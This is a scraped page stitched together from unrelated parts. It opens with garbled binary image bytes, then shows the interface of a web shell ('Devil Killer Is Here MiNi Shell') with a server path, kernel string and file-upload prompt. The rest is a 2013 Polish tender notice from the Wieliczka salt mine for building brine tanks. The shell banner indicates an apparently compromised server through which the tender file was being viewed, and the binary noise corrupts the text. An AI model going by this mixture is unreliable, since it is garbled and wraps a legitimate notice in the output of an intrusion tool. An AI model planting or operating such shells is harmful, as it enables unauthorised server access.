JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130703/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130703/258416-N-2013.html

<p class="kh_header"><b>Wieliczka: Odtworzenie retencji dla solanek i wód zasolonych - budowa nowych zbiorników solankowych - Etap II</b><br>
<b>Numer ogłoszenia: 258416 - 2013; data zamieszczenia: 03.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 278711, 012 2787132, faks 02 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna - Górnictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odtworzenie retencji dla solanek i wód zasolonych - budowa nowych zbiorników solankowych - Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia.
1.1. Przedmiotem zamówienia jest realizacja przez Wykonawcę za wynagrodzeniem, robót budowlanych mających na celu budowę zbiornika ZWZ-103 w ramach wykonania zadania pn: Odtworzenie retencji wód zasolonych. Rozbiórka istniejących zbiorników solanki, budowa nowych zbiorników wraz z fundamentami i trasami rurociągów wód zasolonych, szlamu, solanki, kondensatu, instalacją kanalizacji deszczowej oraz instalacją energetyczną zasilania na działkach nr 39/38 i 39/40 w Wieliczce obr. 1, zwanych dalej budową zbiornika ZWZ-103.
1.2. Budowa zbiornika ZWZ-103 obejmuje:
1) wykonanie robót budowlanych,
2) szkolenie obsługi,
3) przygotowanie dokumentacji koniecznej do dokonania przez Zamawiającego zawiadomienia właściwego organu nadzoru budowlanego o zakończeniu budowy, celem przystąpienia do użytkowania zbiornika.
2. Wykonanie robót budowlanych.
W ramach wykonania robót budowlanych, o których mowa w pkt 1 ppkt 1.1 Wykonawca jest zobowiązany:
1) przygotować teren budowy, w tym wykonać zabezpieczenia, wygrodzenia, obejścia i objazdy niezbędne dla zapewnienia ciągłości ruchu kopalni, jej funkcjonowania, zabezpieczenia przeciw pożarowego oraz bezpiecznego prowadzenia robót,
2) odciąć 4 wyburzane zbiorniki stalowe od rurociągów technologicznych zasilających Instalacji Utylizacji Wód Zasolonych,
3) wyburzyć 4 stare zbiorniki stalowe od strony wschodniej oraz podesty zlokalizowane nad tymi zbiornikami,
4) skuć płytę fundamentową w zakresie niezbędnym do budowy zbiornika,
5) dokonać geodezyjnego wytyczenia projektowanych elementów,
6) wykonać fundamenty (przygotowanie podłoża, deskowanie, zbrojenie, fundamentowanie),
7) dostarczyć i zamontować zbiornik stalowy ZWZ-103 (zbiornik z blachy ocynkowanej musi być pomalowany obustronnie farbami odpornymi na działanie chlorku sodu, kolor farby - RAL 1015 analogicznie do istniejącego zbiornika ZWZ-101),
8) przeprowadzić montaż elementów zbiornika stalowego ZWZ-103 według poniższych zasad:
a) montaż zbiornika ZWZ-103 winien być dokonany za pomocą śrub nierdzewnych A4 lub A2,
b) zbiornik ZWZ-103 winien być wyposażony w dno stożkowe (szlamowanie zbiornika ze stożka) lub dno nachylone w kierunku otworu szlamowego,
c) zbiornik ZWZ -103 winien być wyposażony w dwa mieszadła mechaniczne, 
d) króćce ssawne w zbiorniku ZWZ-103 winny być ulokowane blisko dna zbiornika (jeżeli możliwe wyprowadzone z fundamentu zbiornika),
e) zbiornik ZWZ-103 winien być wyposażony w dolny i górny właz inspekcyjny (dolny na poziomie dna zbiornika w pobliżu rurociągów ssawnych, górny na dachu, dostępny z podestu),
f) zbiornik ZWZ-103 winien mieć wykonaną izolację cieplną oraz winien być zabezpieczony chemoodpornie (wymagane jest dopuszczenie wykonanego zabezpieczenia do kontaktu z produktami spożywczymi),
g) zbiornik ZWZ-103 winien posiadać orynnowanie (rynny PCV-białe ogrzewane),
9) wykonać uziomy fundamentowe zbiornika ZWZ-103,
10) podłączyć zbiornik ZWZ-103 do rurociągów technologicznych,
11) wykonać dodatkowe obarierowanie (właz górny na zbiorniku ZWZ-103 obarierowany i dostępne z podestu),
12) wykonać dojście z zabudowywanego podestu zlokalizowanego nad zbiornikiem ZWZ-103 do zamontowanych drabin (barierki, podest lub rozwiązanie alternatywne),
13) dostarczyć i wykonać rurociągi w tym:
a) ułożyć rurociągi na zewnątrz obiektu Instalacji Utylizacji Wód Zasolonych (rurociągi na zewnątrz obiektu Instalacji Utylizacji Wód Zasolonych w wykonaniu materiałowym rura przewodowa z PE z izolacją z pianki poliuretanowej w rurze osłonowej PE z kablem grzewczym - analogicznie do I etapu prac) obejmujące:
-szlamy ciśnieniowe do zbiornika,
-szlamy grawitacyjne ze zbiornika,
-kanalizacji deszczowej,
-wody zasolone do zbiornika,
-wody zasolone ze zbiornika
-solanki do zbiornika,
-schłodzonych wód zasolonych do zbiornika,
b) przenieść istniejące rurociągi znad wyburzanych zbiorników na pozostałe stare zbiorniki obejmujące:
-szlamy z osadników TH 201 i TH 202 
-wody zasolone,
-szlamy z basenu.
14) dostarczyć i zamontować armaturę (ze względu na etapowanie prac armatura powinna być dostarczona jak w projekcie, sterowanie pneumatyczne lub elektryczne), jako rozwiązanie tymczasowe. Wykonawca zobowiązany jest zabudować dodatkowo dźwignie ręczne lub zapewnić możliwość ręcznej regulacji,
15) wykonać dojście do podestów na zbiornikach w miejscu uzgodnionym z Zamawiającym (drabina lub rozwiązanie alternatywne uzgodnione z Dozorem Działu Utylizacji Wycieków),
16) wykonać podest łączący zbiorniki ZWZ-101, ZWZ-102 ze zbiornikiem ZWZ-103 oraz podesty nad rurociągami dochodzącymi do zbiornika ZWZ-103,
17) wykonać kanalizację deszczową w zakresie III etapu oraz tymczasowe podpięcie do instalacji istniejącej w rejonie starych zbiorników stalowych,
18) podłączyć ogrzewanie elektryczne rurociągów i rynien deszczowych zbiornika ZWZ-103,
19) wykonać osłony napędów elektrycznych i pneumatycznych (daszki z tworzywa sztucznego lub nierdzewne), w zakresie etapu III - na zewnątrz budynku Instalacji Utylizacji Wód Zasolonych,
20) zabudować na zbiorniku ZWZ-103 grzałki oraz mierniki cyfrowe z zasilaniem torów pomiarowych - pomiar temperatury medium, pomiar stopnia napełnienia zbiornika (wyrażony w %), pomiar stężenia medium wyrażony w gNaCl/dm3, w miejscu dostępnym dla obsługi uzgodnionym z Dozorem Działu Utylizacji Wycieków. Wizualizacje należy wykonać w systemie sterowania Instalacji Utylizacji Wód Zasolonych,
21) wykonać docelowe oświetlenia zbiornika ZWZ-103, podestów i terenu w zakresie przedmiotu zamówienia możliwym do zrealizowania w uzgodnieniu z Dozorem Działu Utylizacji Wycieków,
22) uporządkować teren budowy, w tym zutylizować zasolony szlam, gruz, stal - w miarę możliwości na bieżąco,
23) przeprowadzić rozruch, dokonać próbnego napełnienia zbiornika,
24) przeprowadzić szkolenia z zakresu obsługi zbiornika ZWS-103,
25) dostarczyć i zamontować kable z rozdzielni RPS w budynku Instalacji Utylizacji Wód Zasolonych do nowo zabudowywanej armatury,
26) dokonać niezbędnych zmian w zakresie sterowników PLC, dotyczących III etapu prac,
27) zmodernizować istniejące oprogramowanie informatyczne (wizualizacja w systemie sterowania Instalacji Utylizacji Wód Zasolonych) i oprogramowanie sterowania zdalnego maszynami i urządzeniami w zakresie III etapu prac,
28) wykonać okablowanie oraz podłączenie zaworów i osprzętu z etapu III,
29) wykonać barierki od strony południowej zbiornika ZWZ-103 - kontynuacja,
30) wyczyścić i odtworzyć kanał odwadniający od strony południowej - kontynuacja,
31) dostarczyć i zabudować jedną studzienkę rewizyjną na kanale odwadniającym od strony południowej,
32) wykonać izolację fundamentu budynku Instalacji Utylizacji Wód Zasolonych od strony kanału,
33) wykonać izolację płyty fundamentowej zbiornika (2 x papa),
34) zabezpieczyć istniejące rurociągi przesyłowe na czas wykonywania kanału przy budynku Instalacji Utylizacji Wód Zasolonych,
35) wykonać tymczasowe dojście do pomostów zlokalizowanych nad starymi zbiornikami wg uzgodnień z Dozorem Działu Utylizacji Wycieków,
36) zaszpachlować ślady po starych otworach w ścianie  i pomalować elewację na odcinku wykonywanych prac,
37) przenieść szafkę elektryczną z elewacji południowej budynku Instalacji Utylizacji Wód Zasolonych w miejsce dostępne dla obsługi w uzgodnieniu z Dozorem Działu Utylizacji Wycieków,
38) zachować istniejący przyłącz solanki w rejonie wyburzanych zbiorników zastępując rurociąg stalowy rurociągiem PE ogrzewany wraz z nową armaturą wg uzgodnień z Dozorem Działu Utylizacji Wycieków,
39) wykonać docelowe podłączenie rurociągu szlamowego do zbiornika w pomieszczeniu ługów oczyszczonych w rejonie zbiornika ZWZ-102 wraz z uszczelnieniem przebicia przez ścianę wg uzgodnień z Dozorem Działu Utylizacji Wycieków.
3. Dokumentacja projektowa.
Przedmiot zamówienia winien być wykonany zgodnie z:
1) projektem budowlanym nr M-10.679 pod nazwą: Odtworzenie retencji wód zasolonych. Rozbiórka istniejących zbiorników solanki, budowa nowych zbiorników wraz z fundamentami i trasami rurociągów wód zasolonych, szlamu, solanki, kondensatu, instalacją kanalizacji deszczowej oraz instalacją energetyczną zasilania wraz z informacją BIOZ, sporządzonym przez Biuro Projektów 
ZD-projekt HTS Spółka z o.o., 30-969 Kraków, ul. Ujastek 1 w 2012 r. - stanowiącym załącznik nr 1 do specyfikacji,
2) projektami wykonawczymi nr:
a) M-10.700_a pod nazwą: Odtworzenie retencji wód zasolonych - budowa nowych zbiorników z fundamentami i infrastrukturą techniczną. Fundamenty. sporządzonym przez Biuro Projektów ZD-projekt HTS Spółka z o.o., 30-969 Kraków, ul. Ujastek 1 w 2012 r. - stanowiącym załącznik nr 2 do specyfikacji,
b) M-10.710 pod nazwą: Odtworzenie retencji wód zasolonych - budowa nowych zbiorników z fundamentami i infrastrukturą techniczną. Klatka schodowa, dojścia. sporządzonym przez Biuro Projektów ZD-projekt HTS Spółka z o.o., 30-969 Kraków, ul. Ujastek 1 w 2012 r. - stanowiącym załącznik nr 3 do specyfikacji,
c) M-11.401 pod nazwą: Odtworzenie retencji wód zasolonych. Budowa nowych zbiorników. Część elektryczna. sporządzonym przez Biuro Projektów ZD-projekt HTS Spółka z o.o., 30-969 Kraków, ul. Ujastek 1 w 2012 r. - stanowiącym załącznik nr 4 do specyfikacji,
d) M-14.1062_a pod nazwą: Odtworzenie retencji wód zasolonych. Budowa nowych zbiorników. Kanalizacja deszczowa. sporządzonym przez Biuro Projektów ZD-projekt HTS Spółka z o.o., 30-969 Kraków, ul. Ujastek 1 w 2012 r. - stanowiącym załącznik nr 5 do specyfikacji,
e) M-16.291 pod nazwą: Odtworzenie retencji wód zasolonych - budowa nowych zbiorników. Instalacja sprężonego powietrza. sporządzonym przez Biuro Projektów ZD-projekt HTS Spółka z o.o., 30-969 Kraków, ul. Ujastek 1 w 2012 r. - stanowiącym załącznik nr 6 do specyfikacji,
f) M-20.348_a pod nazwą: Odtworzenie retencji wód zasolonych - budowa nowych zbiorników. Część energetyczna. sporządzonym przez Biuro Projektów ZD-projekt HTS Spółka z o.o., 30-969 Kraków, ul. Ujastek 1 w 2012 r. - stanowiącym załącznik nr 7 do specyfikacji,
g) M-20.348_PW_I pod nazwą: Odtworzenie retencji wód zasolonych - budowa nowych zbiorników. Dokumentacja powykonawcza etapu I. sporządzonym przez Biuro Projektów ZD-projekt HTS Spółka z o.o., 30-969 Kraków, ul. Ujastek 1 w 2012 r. - stanowiącym załącznik nr 8 do specyfikacji,
3) informacją dotyczącą bezpieczeństwa i ochrony zdrowia - stanowiącą załącznik nr 9 do specyfikacji,
4) specyfikacją techniczną wykonania i odbioru robót - stanowiącą załącznik nr 10 do specyfikacji,
5) decyzją o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę, nr 320/2012, z dnia 20.04.2012 r., wydaną przez Starostę Wielickiego - stanowiącą załącznik nr 11 do specyfikacji.
Szczegółowy opis przedmiotu zamówienia, warunki dotyczące jego realizacji oraz warunki płatności zawarte zostały we wzorze umowy stanowiącym załącznik nr 18 do SIWZ, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.32.50-0, 45.26.23.10-7, 45.26.23.00-4, 45.23.13.00-8, 45.11.12.20-6, 45.23.11.10-9, 45.23.10.00-5, 45.31.43.10-7, 45.23.20.00-2, 45.31.11.00-1, 51.11.00.00-6, 71.31.41.00-3, 72.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości: 30 000,00 zł (trzydzieści tysięcy złotych) należy wnieść przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowanie wykonania w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch robót budowlanych polegających na budowie zbiornika stalowego bądź zbiorników stalowych 
o wartości nie mniejszej niż 450 000,00 zł brutto każda, wraz z podaniem ich rodzaju i wartości, dat i miejsc wykonania oraz załączeniem dowodów, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowanie, iż osoba, która pełnić będzie funkcję kierownika budowy posiada uprawnienie budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 1 000 000,00 złotych (polisa a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie, o którym mowa w ust. 2, z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2. Dopuszcza się możliwość dokonania istotnych zmian postanowień niniejszej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1) niedostępności na rynku materiałów wskazanych w dokumentacji, o której mowa w § 6,
2) pojawienia się na rynku materiałów, urządzeń, rozwiązań technicznych lub technologicznych pozwalających na zmniejszenie kosztów realizacji przedmiotu umowy lub zwiększenie wartości użytkowej wykonanego przedmiotu umowy,
3) potrzeby wykonania przedmiotu umowy przy użyciu innych materiałów, urządzeń lub zastosowaniu innych rozwiązań technicznych lub technologicznych niż wskazane w dokumentacji, o której mowa w § 6. Potrzeba wykonania przedmiotu umowy przy użyciu innych materiałów, urządzeń lub zastosowaniu innych rozwiązań technicznych lub technologicznych zachodzi w sytuacji gdy:
a) użycie przewidzianych w dokumentacji, o której mowa w § 6, materiałów, urządzeń rozwiązań technicznych lub technologicznych, groziłoby niewykonaniem lub nienależytym wykonaniem przedmiotu umowy przez Wykonawcę,
b) użycie innych materiałów, urządzeń lub zastosowaniu innych rozwiązań technicznych lub technologicznych wynika ze zmiany przepisów prawa, 
4) wystąpienia odmiennych od przyjętych w dokumentacji, o której mowa w § 6, warunków realizacji przedmiotu umowy, które groziłyby niewykonaniem 
lub nienależytym wykonaniem przedmiotu umowy przez Wykonawcę przy użyciu dotychczasowych materiałów, urządzeń lub zastosowaniu dotychczasowych rozwiązań technicznych lub technologicznych,
5) potrzeby usunięcia ujawnionych sprzeczności lub wad w dokumentacji, o której mowa w § 6,
6) udzielenia Wykonawcy przez Zamawiającego zamówienia na wykonanie robót dodatkowych, w rozumieniu przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
7) przestojów i opóźnień w wykonywaniu przedmiotu umowy, zawinionych przez Zamawiającego,
8) działania siły wyższej,
9) zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3. Zaistnienie przyczyn, wymienionych w ust. 2, nie powoduje powstania u żadnej ze Stron niniejszej umowy, roszczenia o zmianę umowy.
4. W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w ust. 2, każdej ze Stron niniejszej umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę niniejszej umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1) szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2) uzasadnienie dokonania zmiany umowy,
3) projekt zmiany umowy.
5. Wystąpienie, o którym mowa w ust. 4 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
6. Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
7. Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
8. Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
